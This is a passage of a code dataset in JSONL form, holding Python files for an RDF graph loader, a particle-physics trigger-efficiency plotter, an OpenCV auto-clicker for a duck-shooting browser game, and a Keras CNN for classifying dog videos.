final tuple.\r\n Return None if the tuple should be ignored.\r\n\r\n Parameters\r\n ----------\r\n raw_tuple : tuple of rdflib.term.Identifier\r\n (subject, predicate, object) tuple\r\n sbj : Entity\r\n Subject entity\r\n rel : Relation\r\n Relation\r\n obj : Entity\r\n Object entity\r\n Returns\r\n -------\r\n (Entity, Relation, Entity)\r\n The final tuple or None if should be ignored\r\n \"\"\"\r\n pass\r\n\r\n @abc.abstractmethod\r\n def process_idx_file_line(self, line):\r\n \"\"\"Process one line of ``trainingSet.tsv`` or ``testSet.tsv``.\r\n Parameters\r\n ----------\r\n line : str\r\n One line of the file\r\n Returns\r\n -------\r\n (str, str)\r\n One sample and its label\r\n \"\"\"\r\n pass\r\n\r\n\r\n\r\n\r\n def __getitem__(self, idx):\r\n r\"\"\"Gets the graph object\r\n \"\"\"\r\n g = self._hg\r\n return g\r\n\r\n def __len__(self):\r\n r\"\"\"The number of graphs in the dataset.\"\"\"\r\n return 1\r\n\r\n @property\r\n def save_name(self):\r\n return self.name + '_dgl_graph'\r\n\r\n @property\r\n def graph(self):\r\n deprecate_property('dataset.graph', 'hg = dataset[0]')\r\n return self._hg\r\n\r\n\r\nclass TwitterDataset(RDFGraphDataset):\r\n\r\n entity_prefix1 = 'http://www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests#'\r\n entity_prefix2 = 'http://dbpedia.org/resource/'\r\n relation_prefix = 'http://dbpedia.org/ontology/'\r\n\r\n\r\n\r\n def __init__(self, name=None, url=None,\r\n raw_dir='../data/deneme/',\r\n force_reload=False,\r\n verbose=True):\r\n\r\n name = 'model_junior.rdf'\r\n\r\n super(TwitterDataset, self).__init__(name, url,\r\n raw_dir=raw_dir,\r\n force_reload=force_reload,\r\n verbose=verbose)\r\n\r\n def __getitem__(self, idx):\r\n r\"\"\"Gets the graph object\r\n\r\n Parameters\r\n -----------\r\n idx: int\r\n Item index, AIFBDataset has only one graph object\r\n\r\n Return\r\n -------\r\n :class:`dgl.DGLGraph`\r\n\r\n The graph contains:\r\n\r\n - ``ndata['train_mask']``: mask for training node set\r\n - ``ndata['test_mask']``: mask for testing node set\r\n - ``ndata['labels']``: mask for labels\r\n \"\"\"\r\n return super(TwitterDataset, self).__getitem__(idx)\r\n\r\n\r\n def __len__(self):\r\n r\"\"\"The number of graphs in the dataset.\r\n\r\n Return\r\n -------\r\n int\r\n \"\"\"\r\n return super(TwitterDataset, self).__len__()\r\n\r\n def parse_entity(self, term):\r\n if isinstance(term, rdf.Literal):\r\n return Entity(e_id=str(term), cls=\"_Literal\")\r\n if isinstance(term, rdf.BNode):\r\n return None\r\n entstr = str(term)\r\n if entstr.startswith(self.entity_prefix1):\r\n sp = entstr.find(\"#\")+1\r\n cl = entstr.find(\"/\")\r\n print(Entity(e_id=entstr[sp:], cls=entstr[cl+1:sp-1]))\r\n return Entity(e_id=entstr[sp:], cls=entstr[cl+1:sp-1])\r\n elif entstr.startswith(self.entity_prefix2):\r\n cl = entstr.rindex(\"/\")\r\n print(Entity(e_id=entstr[cl+1:], cls=entstr[:cl]))\r\n return Entity(e_id=entstr[cl+1:], cls=entstr[:cl])\r\n else:\r\n return None\r\n\r\n def parse_relation(self, term):\r\n if isinstance(term, rdf.Literal):\r\n #print(term)\r\n return Relation(cls=\"_Literal\")\r\n relstr = str(term)\r\n if relstr.startswith(self.relation_prefix):\r\n return Relation(cls=relstr.split('/')[4])\r\n else:\r\n relstr = relstr.split('/')[-1]\r\n return Relation(cls=relstr)\r\n\r\n def process_tuple(self, raw_tuple, sbj, rel, obj):\r\n if sbj is None or rel is None or obj is None:\r\n return None\r\n return (sbj, rel, obj)\r\n\r\n def process_idx_file_line(self, line):\r\n _, person, _, label = line.strip().split('\\t')\r\n return person, label\r\n\r\n\r\n\r\ndef _get_id(dict, key):\r\n id = dict.get(key, None)\r\n if id is None:\r\n id = len(dict)\r\n dict[key] = id\r\n return id\r\n\r\n\r\ng=TwitterDataset()\r\ng = g[0]\r\n\r\nnum_classes = TwitterDataset().num_classes\r\ntrain_mask = g.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data.pop('train_mask')\r\ntest_mask = g.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data.pop('test_mask')\r\nlabels = g.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data.pop('labels').tolist()\r\nimport torch\r\ntrain_idx = torch.nonzero(train_mask).squeeze().tolist()\r\ntest_idx = torch.nonzero(test_mask).squeeze().tolist()\r\nedge_list = []\r\nmat_dict = {}\r\nfor srctype, etype, dsttype in g.canonical_etypes:\r\n canonical_etypes = (srctype, etype, dsttype)\r\n edge_type = srctype.strip('_')+'||'+etype.strip('_')+'||' + dsttype.strip('_')\r\n mat_dict[edge_type] = g.adj(scipy_fmt='coo', etype=canonical_etypes)\r\n edge_list.append(edge_type)\r\n\r\ninfo_dict = {'num_classes': num_classes, 'predict_category': \"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\", 'train_idx': train_idx,\r\n 'test_idx': test_idx, 'labels': labels, 'ntypes': g.ntypes, 'etypes': g.etypes, 'edge_list': edge_list}\r\nimport scipy.io\r\nimport scipy.sparse as sp\r\nscipy.io.savemat('interests.mat', mat_dict)\r\nimport json\r\nwith open('interests_info.json', 'w') as f:\r\n json.dump(info_dict, f)","repo_name":"gokceuludogan/community-detection-w-interests","sub_path":"src/RDFGraphDataset.py","file_name":"RDFGraphDataset.py","file_ext":"py","file_size_in_byte":19999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14409327226","text":"#Standard imports\nimport ROOT\nfrom math import sqrt, cos, sin, pi, acos\nimport itertools\nimport array\nimport os\n\n#RootTools\nfrom RootTools.core.standard import *\n\n#StopsDilepton\nfrom StopsDilepton.tools.objectSelection import muonSelectorString, eleSelectorString\n\n# argParser\nimport argparse\nargParser = argparse.ArgumentParser(description = \"Argument parser\")\nargParser.add_argument('--logLevel',\n action='store',\n nargs='?',\n choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE', 'NOTSET'],\n default='INFO',\n help=\"Log level for logging\"\n)\n\nargParser.add_argument('--small',\n action='store_true',\n #default = True,\n help='Small?',\n) \n\nargParser.add_argument('--selection',\n #default='Sum$(Jet_pt>30&&abs(Jet_eta)<2.4&&Jet_id)>=1',\n default='',\n type=str,\n action='store',\n)\n\nHLT_MET_hadronic = \"(HLT_HT350_MET100||HLT_HT350||HLT_HT475||HLT_HT600||HLT_dijet||HLT_jet||HLT_dijet70met120||HLT_dijet55met110||HLT_HT900||HLT_HT800||HLT_MET170_NotCleaned||HLT_MET170_HBHECleaned||HLT_MET170_BeamHaloCleaned||HLT_AllMET170||HLT_AllMET300||HLT_HT350_MET100)\"\n\nargParser.add_argument('--baseTrigger',\n default=HLT_MET_hadronic,\n\n type=str,\n action='store',\n)\n\nargParser.add_argument('--dileptonTrigger',\n default='HLT_mue',\n type=str,\n action='store',\n)\n\n\nargParser.add_argument('--sample',\n default='JetHT',\n type=str,\n action='store',\n)\n\nargParser.add_argument('--plot_directory',\n default='pngEff',\n type=str,\n action='store',\n)\n\nargParser.add_argument('--minLeadingLeptonPt',\n default=0,\n type=int,\n action='store',\n)\n\nargParser.add_argument('--mode',\n default='muEle',\n action='store',\n choices=['doubleMu', 'doubleEle', 'muEle'])\n\nargs = argParser.parse_args()\n\n\n# Logging\nimport StopsDilepton.tools.logger as logger\nlogger = logger.get_logger(args.logLevel, logFile = None )\nimport RootTools.core.logger as logger_rt\nlogger_rt = logger_rt.get_logger(args.logLevel, logFile = None )\n\nmaxN = 10 if args.small else -1 \n\nfrom CMGTools.RootTools.samples.samples_13TeV_DATA2016 import *\n\nfrom StopsDilepton.samples.heppy_dpm_samples import data_03Feb2017_heppy_mapper as data_heppy_mapper\n# return data_heppy_mapper.from_heppy_samplename(heppy_sample.name, maxN = maxN)\n\ndata_samples = [data_heppy_mapper.from_heppy_samplename(s.name) for s in dataSamples_03Feb2017 if s.name.startswith(args.sample)]\nfor s in data_samples:\n if maxN>0:\n s.files = s.files[:maxN]\n logger.info(\"Adding data sample %s (heppy: %s)\", s.name, s.heppy.name)\n\n#from StopsDilepton.samples.helpers import fromHeppySample\n#data_Run2016B = fromHeppySample(\"%s_Run2016B_PromptReco_v2\" % args.sample, data_path = '/scratch/rschoefbeck/cmgTuples/80X_1l_12', maxN = maxN)\n#data_Run2016C = fromHeppySample(\"%s_Run2016C_PromptReco_v2\" % args.sample, data_path = '/scratch/rschoefbeck/cmgTuples/80X_1l_12', maxN = maxN)\n#data_Run2016D = fromHeppySample(\"%s_Run2016D_PromptReco_v2\" % args.sample, data_path = '/scratch/rschoefbeck/cmgTuples/80X_1l_12', maxN = maxN)\n#\n\ndata=Sample.combine( \"Run2016BCDEFGH\", data_samples )\npreprefix = \"Run2016BCDEFGH\"\ntriggerName = args.dileptonTrigger.replace('||','_OR_')\n\npt_thresholds = range(0,30,2)+range(30,50,5)+range(50,210,10)\neta_thresholds = [x/10. for x in range(-25,26,1) ]\npt_thresholds_coarse = range(5,25,10)+range(25,130,15)+range(130,330,50)\npt_thresholds_veryCoarse = [20,25,35] + range(50,200,50)+[250]\neta_thresholds_coarse = [x/10. for x in range(-25,26,5) ]\n\neff_pt1 = ROOT.TProfile(\"eff_pt1\",\"eff_pt1\", len(pt_thresholds)-1, array.array('d',pt_thresholds), 0,1)\neff_pt1.GetYaxis().SetTitle(triggerName)\neff_pt1.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt2 = ROOT.TProfile(\"eff_pt2\",\"eff_pt2\", len(pt_thresholds)-1, array.array('d',pt_thresholds), 0,1)\neff_pt2.GetYaxis().SetTitle(triggerName)\neff_pt2.GetXaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt2.style = styles.errorStyle( ROOT.kBlack )\n\neff_eta1 = ROOT.TProfile(\"eff_eta1\",\"eff_eta1\", len(eta_thresholds)-1, array.array('d',eta_thresholds), 0,1)\neff_eta1.GetYaxis().SetTitle(triggerName)\neff_eta1.GetXaxis().SetTitle(\"#eta of leading lepton\")\neff_eta1.style = styles.errorStyle( ROOT.kBlack )\n\neff_eta2 = ROOT.TProfile(\"eff_eta2\",\"eff_eta2\", len(eta_thresholds)-1, array.array('d',eta_thresholds), 0,1)\neff_eta2.GetYaxis().SetTitle(triggerName)\neff_eta2.GetXaxis().SetTitle(\"#eta of trailing lepton\")\neff_eta2.style = styles.errorStyle( ROOT.kBlack )\n\nht = ROOT.TH1D(\"ht\",\"ht\", 2000/50,0,2000)\nht.GetYaxis().SetTitle(\"Number of events\")\nht.GetXaxis().SetTitle(\"H_{T} (GeV)\")\nht.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_pt2 = ROOT.TProfile2D(\"eff_pt1_pt2\",\"eff_pt1_pt2\", len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse), len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse))\neff_pt1_pt2.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_pt2.GetYaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt1_pt2.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_pt2_veryCoarse = ROOT.TProfile2D(\"eff_pt1_pt2_veryCoarse\",\"eff_pt1_pt2_veryCoarse\", len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse), len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse))\neff_pt1_pt2_veryCoarse.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_pt2_veryCoarse.GetYaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt1_pt2_veryCoarse.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_pt2_highEta1_veryCoarse = ROOT.TProfile2D(\"eff_pt1_pt2_highEta1_veryCoarse\",\"eff_pt1_pt2_highEta1_veryCoarse\", len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse), len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse))\neff_pt1_pt2_highEta1_veryCoarse.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_pt2_highEta1_veryCoarse.GetYaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt1_pt2_highEta1_veryCoarse.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_pt2_lowEta1_veryCoarse = ROOT.TProfile2D(\"eff_pt1_pt2_lowEta1_veryCoarse\",\"eff_pt1_pt2_lowEta1_veryCoarse\", len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse), len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse))\neff_pt1_pt2_lowEta1_veryCoarse.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_pt2_lowEta1_veryCoarse.GetYaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt1_pt2_lowEta1_veryCoarse.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_eta1 = ROOT.TProfile2D(\"eff_pt1_eta1\",\"eff_pt1_eta1\", len(pt_thresholds_coarse)-1, array.array('d',pt_thresholds_coarse), len(eta_thresholds_coarse)-1, array.array('d',eta_thresholds_coarse))\neff_pt1_eta1.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_eta1.GetYaxis().SetTitle(\"#eta of leading lepton\")\neff_pt1_eta1.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt2_eta2 = ROOT.TProfile2D(\"eff_pt2_eta2\",\"eff_pt2_eta2\", len(pt_thresholds_coarse)-1, array.array('d',pt_thresholds_coarse), len(eta_thresholds_coarse)-1, array.array('d',eta_thresholds_coarse))\neff_pt2_eta2.GetXaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt2_eta2.GetYaxis().SetTitle(\"#eta of trailing lepton\")\neff_pt2_eta2.style = styles.errorStyle( ROOT.kBlack )\n\nlogger.info( \"Sample: %s\" % data.name )\n\ndef leptonSelectorString(index, ptCut):\n return '('+muonSelectorString(index=index, ptCut=ptCut)+'||'+eleSelectorString(index=index, ptCut=ptCut)+')'\n\nif args.mode=='doubleMu':\n selString = muonSelectorString\nelif args.mode=='doubleEle':\n selString = eleSelectorString\nelif args.mode== 'muEle':\n selString = leptonSelectorString\nelse: \n raise ValueError( \"Mode %s not known\" % args.mode )\n\nselection_string = \"&&\".join( str_ for str_ in [\\\n 'Sum$('+selString(ptCut=0,index=None)+')==2' if args.mode in ['doubleMu', 'doubleEle'] \n else 'Sum$('+muonSelectorString(ptCut=0,index=None)+')==1&&Sum$('+eleSelectorString(ptCut=0,index=None)+')==1', \n args.baseTrigger,\n args.selection\n ] if str_ )\n\n\nplot_string_pt1 = args.dileptonTrigger+\":MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1\"\nplot_string_pt2 = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt2\"\n\nlogger.info( \"Plot string: %s\" % plot_string_pt1 )\nlogger.info( \"Selection: %s\" % selection_string )\n \ndata.chain.Draw(plot_string_pt1, selection_string, 'goff')\ndata.chain.Draw(plot_string_pt2, selection_string, 'goff')\n\ndata.chain.Draw(\"Sum$(Jet_pt*(Jet_pt>30&&abs(Jet_eta)<2.4&&Jet_id))>>ht\", selection_string, 'goff')\n\nplot_string_eta1 = args.dileptonTrigger+\":LepGood_eta>>eff_eta1\"\ndata.chain.Draw(plot_string_eta1, selection_string+\"&&LepGood_pt==MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+')', 'goff') \n\nplot_string_eta2 = args.dileptonTrigger+\":LepGood_eta>>eff_eta2\"\ndata.chain.Draw(plot_string_eta2, selection_string+\"&&LepGood_pt==MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+')', 'goff') \n\nplot_string_pt1_pt2 = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2\"\ndata.chain.Draw(plot_string_pt1_pt2, selection_string, 'goff')\nplot_string_pt1_pt2_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_veryCoarse\"\ndata.chain.Draw(plot_string_pt1_pt2_veryCoarse, selection_string, 'goff')\n\nif args.mode=='muEle':\n # split high/low wrt muon\n plot_string_pt1_pt2_highEta1_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_highEta1_veryCoarse\"\n data.chain.Draw(plot_string_pt1_pt2_highEta1_veryCoarse, selection_string+\"&&Sum$(abs(LepGood_pdgId)==13&&abs(LepGood_eta)>1.5&&\"+selString(index=None,ptCut=0)+')==1', 'goff')\n\n plot_string_pt1_pt2_lowEta1_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_lowEta1_veryCoarse\"\n data.chain.Draw(plot_string_pt1_pt2_lowEta1_veryCoarse, selection_string+\"&&Sum$(abs(LepGood_pdgId)==13&&abs(LepGood_eta)<=1.5&&\"+selString(index=None,ptCut=0)+')==1', 'goff')\nelse:\n # split high/low wrt leading lepton\n plot_string_pt1_pt2_highEta1_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_highEta1_veryCoarse\"\n data.chain.Draw(plot_string_pt1_pt2_highEta1_veryCoarse, selection_string+\"&&Sum$(abs(LepGood_eta)>1.5&&LepGood_pt==MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+'))==1', 'goff')\n\n plot_string_pt1_pt2_lowEta1_veryCoarse = args.dileptonTrigger+\":MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\"):MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_pt2_lowEta1_veryCoarse\"\n data.chain.Draw(plot_string_pt1_pt2_lowEta1_veryCoarse, selection_string+\"&&Sum$(abs(LepGood_eta)<=1.5&&LepGood_pt==MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+'))==1', 'goff')\n\nplot_string_pt1_eta1 = args.dileptonTrigger+\":LepGood_eta:MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt1_eta1\"\ndata.chain.Draw(plot_string_pt1_eta1, selection_string+\"&&LepGood_pt==MaxIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+')', 'goff')\n\nplot_string_pt2_eta2 = args.dileptonTrigger+\":LepGood_eta:MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+\")>>eff_pt2_eta2\"\ndata.chain.Draw(plot_string_pt2_eta2, selection_string+\"&&LepGood_pt==MinIf$(LepGood_pt,\"+selString(index=None,ptCut=0)+')', 'goff')\n\n\nprefix = preprefix+\"_%s_%s_measuredIn%s_minLeadLepPt%i\" % ( triggerName, 'baseTrigger_METhadronic', args.sample, args.minLeadingLeptonPt)\nif args.small: prefix = \"small_\" + prefix\n\nfrom StopsDilepton.tools.user import plot_directory\nplot_path = os.path.join(plot_directory, args.plot_directory, prefix)\n\nplotting.draw(\n Plot.fromHisto(name = 'pt1_'+triggerName, histos = [[ eff_pt1 ]], texX = \"p_{T} of leading lepton\", texY = triggerName),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = False, sorting = False,\n yRange = (0,1), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\nplotting.draw(\n Plot.fromHisto(name = 'pt2_'+triggerName, histos = [[ eff_pt2 ]], texX = \"p_{T} of trailing lepton\", texY = triggerName),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = False, sorting = False,\n yRange = (0,1), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\nplotting.draw(\n Plot.fromHisto(name = 'eta1_'+triggerName, histos = [[ eff_eta1 ]], texX = \"#eta of leading lepton\", texY = triggerName),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = False, sorting = False,\n yRange = (0,1), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\nplotting.draw(\n Plot.fromHisto(name = 'eta2_'+triggerName, histos = [[ eff_eta2 ]], texX = \"#eta of trailing lepton\", texY = triggerName),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = False, sorting = False,\n yRange = (0,1), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\nplotting.draw(\n Plot.fromHisto(name = \"ht_\"+triggerName, histos = [[ ht ]], texX = \"H_{T} (GeV)\", texY = \"Number of events\"),\n plot_directory = plot_path, #ratio = ratio, \n logX = False, logY = True, sorting = False,\n yRange = (0.3,\"auto\"), legend = None ,\n # scaling = {0:1},\n # drawObjects = drawObjects( dataMCScale )\n)\n\nROOT.gStyle.SetPadRightMargin(0.15)\nROOT.gStyle.SetPaintTextFormat(\"2.2f\")\nfor name, plot in [\n [\"pt1_pt2\", eff_pt1_pt2],\n [\"pt1_pt2_veryCoarse\", eff_pt1_pt2_veryCoarse],\n [\"pt1_pt2_lowEta1_veryCoarse\", eff_pt1_pt2_lowEta1_veryCoarse],\n [\"pt1_pt2_highEta1_veryCoarse\", eff_pt1_pt2_highEta1_veryCoarse],\n [\"pt1_eta1\", eff_pt1_eta1],\n [\"pt2_eta2\", eff_pt2_eta2],\n ]:\n c1 = ROOT.TCanvas()\n if 'veryCoarse' in name:\n plot.SetMarkerSize(0.8)\n #plot.Draw(\"COLZTextE\")\n plot.Draw(\"COLZText\")\n else:\n plot.Draw(\"COLZ\" )\n\n plot.GetZaxis().SetRangeUser(0,1)\n c1.Print(os.path.join(plot_path, triggerName+'_'+name+'.png') )\n c1.Print(os.path.join(plot_path, triggerName+'_'+name+'.pdf') )\n c1.Print(os.path.join(plot_path, triggerName+'_'+name+'.root') )\n del c1\n\nofile = ROOT.TFile.Open(os.path.join(plot_path, prefix+'.root'), 'recreate')\neff_pt1.Write()\neff_pt2.Write()\neff_eta1.Write()\neff_eta2.Write()\neff_pt1_pt2.Write()\neff_pt1_pt2_highEta1_veryCoarse.Write()\neff_pt1_pt2_lowEta1_veryCoarse.Write()\neff_pt1_eta1.Write()\neff_pt2_eta2.Write()\nht.Write()\nofile.Close()\n","repo_name":"HephyAnalysisSW/StopsDilepton","sub_path":"plots/plotsRobert/2016/trigger/triggerEff.py","file_name":"triggerEff.py","file_ext":"py","file_size_in_byte":14908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"237917827","text":"import win32gui\n\nimport numpy as np\nimport cv2\nimport time\nimport pyautogui\nfrom PIL import ImageGrab\n\nJogarJogo = True\nVerMascaras = False\nVerRetangulos = False\ncor_pato_preto = np.array([0,0,0])\ncor_minima_pato_vermelho = np.array([170,50,50]) # Range mínimo para a cor vermelha\ncor_maxima_pato_vermelho = np.array([180,255,255]) # Range máximo para a cor vermelha\n\ntoplist, winlist = [], []\n\ndef enum_cb(hwnd, results):\n winlist.append((hwnd, win32gui.GetWindowText(hwnd)))\nwin32gui.EnumWindows(enum_cb, toplist)\n\n\nfirefox = [(hwnd, title) for hwnd, title in winlist if 'firefox' in title.lower()]\nfirefox = firefox[0]\nhwnd = firefox[0]\n\nvalores_desejados = [16,25,34,12,11,30]\nwin32gui.SetForegroundWindow(hwnd)\nbbox = win32gui.GetWindowRect(hwnd)\n\nwhile True:\n try:\n img = ImageGrab.grab(bbox)\n imgcv = np.array(img)\n imgcv = imgcv[:,:,::-1].copy()\n hsv = cv2.cvtColor(imgcv,cv2.COLOR_BGR2HSV)\n hsv = cv2.rectangle(hsv,(0,0),(800,250),(0,0,0),-1)\n hsv = cv2.rectangle(hsv,(0,550),(802,864),(0,0,0),-1)\n mascara_cor_preta = cv2.inRange(hsv, cor_pato_preto, cor_pato_preto)\n mascara_cor_vermelha = cv2.inRange(hsv,cor_minima_pato_vermelho,cor_maxima_pato_vermelho)\n\n mascaras_combinadas = cv2.bitwise_or(mascara_cor_vermelha,mascara_cor_preta)\n contornos, hierarquia = cv2.findContours(mascaras_combinadas,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n for contorno in contornos:\n x, y, w, h = cv2.boundingRect(contorno)\n if ( h in valores_desejados):\n if (JogarJogo and not VerMascaras and not VerRetangulos):\n middlex = int(x + w / 2)\n middley = int(y + h / 2)\n pyautogui.click(middlex, middley)\n print (\"Atirou na posição: (\",middlex,middley,\")\")\n time.sleep(1.3)\n break\n if (VerRetangulos):\n cv2.rectangle(imgcv, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n if (VerMascaras):\n cv2.imshow('Mascara Pato',mascaras_combinadas)\n\n elif(VerRetangulos):\n cv2.imshow('Retangulo Pato',imgcv)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n except Exception as e:\n print(e)\n exit()\n\n\ncv2.destroyAllWindows()\n","repo_name":"danilo94/OpenCVDuckHunter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"41631815365","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\nimport cv2, os, sys\nimport numpy as np\n#import tensorflow as tf\n#import keras\nfrom keras.preprocessing.image import array_to_img, img_to_array\nfrom keras.models import Sequential\nfrom keras.utils import np_utils, plot_model\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom sklearn.model_selection import train_test_split\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom time import time\nvideo_dir = \"./Img/Dogs/\"\n#classes = [f for f in os.listdir(video_dir) if os.path.isdir(os.path.join(video_dir, f))]\nclasses = ['Car', 'Drink', 'Feed', 'LookLeft', 'LookRight', 'Pet', 'PlayBall', 'Shake', 'Sniff', 'Walk', 'TurnRight']\nclass_num = len(classes)\ntrain_x = []\ntrain_y = []\nepoch = 200\nbatch = 30 \nsavename = \"dog_mean\"\n#savename = \"plt_test\"\n\nfor i in range(class_num):\n# print(classes[i])\n datadir = os.path.join(video_dir,classes[i])\n #print(datadir)\n # = os.listdir(datadir)\n paths = [f for f in os.listdir(datadir) if os.path.isfile(os.path.join(datadir, f))]\n for j in paths:\n n = 0\n frames = []\n path = os.path.join(datadir,j)\n# print(path)\n cap = cv2.VideoCapture(path)\n ret, frame = cap.read()\n #while(cap.isOpened()):\n while(ret == True):\n #gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #frame = img_to_array(frame)\n #frame = cv2.resize(frame, (24,24))\n frames.append(frame)\n ret, frame = cap.read()\n # cv2.imwrite('frame.png',gray)\n frames = (np.asarray(frames).mean(axis=0)) # the average overall frames\n train_x.append(frames)\n train_y.append(i)\n\n cap.release()\n\n#cv2.destroyAllWindows()\n\n#[0,1,2] -> [[1,0,0],[0,1,0],[0,0,1]]\ntrain_y = np_utils.to_categorical(train_y, class_num)\n# tmp = []\n# for i in train_y:\n# l = [0]*class_num\n# l[int(i)-1] = 1\n# tmp.append(l)\n# train_y = np.asarray(tmp)\ntrain_x, train_y = np.asarray(train_x), np.asarray(train_y)\ntrain_x = train_x.astype('float32')\ntrain_x = train_x / 255 # 画素値を0から1の範囲に変換\n\ntrain_x, test_x, train_y, test_y = train_test_split(train_x, train_y, test_size=0.33)#, random_state=111) #rand seed\n\n#モデルを作ってください.\nmodel = Sequential()\n\nmodel.add(Conv2D(32, (3, 3), padding='same',\n input_shape=train_x.shape[1:]))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(class_num)) # クラスはn個\nmodel.add(Activation('softmax'))\n\n# コンパイル\nmodel.compile(loss='categorical_crossentropy',\n optimizer='SGD',\n metrics=['accuracy'])\nplot_model(model, to_file=\"Img/Models/\"+savename+\"_model.png\", show_shapes=True)\n\nsecc = time()\nhistory = model.fit(train_x, train_y, batch_size=batch, epochs=epoch,\n validation_data=(test_x, test_y), verbose=2)\ncost = time()-secc\n# plt.plot(history.history['acc'])\n# plt.plot(history.history['val_acc'])\n# plt.title('model accuracy')\n# plt.xlabel('epoch')\n# plt.ylabel('accuracy')\n# plt.legend(['acc', 'val_acc'], loc='lower right')\n# plt.savefig(\"Img/\"+savename+\"_acc.png\")\n\nfig, (ac, los) = 